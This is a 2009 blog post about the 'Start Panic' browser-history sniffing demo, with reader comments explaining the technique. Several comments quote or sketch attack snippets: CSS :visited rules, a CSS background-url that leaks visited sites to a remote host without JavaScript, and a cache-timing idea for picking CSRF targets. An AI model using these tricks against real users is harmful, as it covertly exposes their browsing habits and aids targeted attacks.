Start Panic

By Deane Barker on April 24, 2009

Start Panicking!: Think your browsing history is secure? It’s not.

Go here, and press the button.

If someone knows how they’re doing this, do tell.

Gadgetopia
What Links Here

Comments

  1. I’ve not looked at the code (yet) but I suspect they’re putting links in the DOM and then checking their colour via CSS. It works because browsers change the link colours for websites that you’ve previously visited.

  2. Yep, a quick look at the code shows:

    p.doc.write(“a{color: #000000; display:none;}”); p.doc.write(“a:visited {color: #FF0000; display:inline;}”);

    So it’s only showing websites that have been visited. It also explains why they only seem to be top level domains it finds, and all reasonably popular. Still it’s quite impressive how many it can find (it must have a huge database of domains).

  3. javascript running on MY machine can find my visited history.

    it’s not like this is serverside technology.

    clever, but not a security issue.

  4. @jonathan It isn’t a server side script, but it doesn’t mean it’s not a security issue. Script posts its results to server, effectively notifying server about sites you’ve visited.

  5. I wouldn’t be too fast to dismiss this as minor.

    @jcg: That’s good, and I use NoScript too, but what about all the people who don’t? @jonathan: Imagine a less-than-ethical business which would utilize this idea, coupled with a targeted database to determine browsing habits of their customers. Imagine advertisers using this as spyware. Yes it is client-side, but it doesn’t require any user input to run, and the results could easily be sent back to a database, as Slobodan pointed out.

    There are many nasty uses for this, if you put your mind to it.

  6. noscript alone won’t protect you; you can load remote images in css without the help of javascript (“background: url(‘http://www.example.com/www.yahoo.com’);”)

  7. As some security experts have pointed out, this is good for determining if a particular CSRF may be appropriate for the visitor.

    I’m thinking it wouldn’t be difficult to load some hidden images from other sites (bankofamerica.com/global/images/new_Banklogo.gif) and find the load time to determine if it was cached and displayed versus downloaded and displayed.

  8. So, does the above link that Pete so kindly posted find the history of the browser? My Chrome history page does that.

Comments are closed. If you have something you really want to say, email editors@gadgetopia.com and we‘ll get it added for you.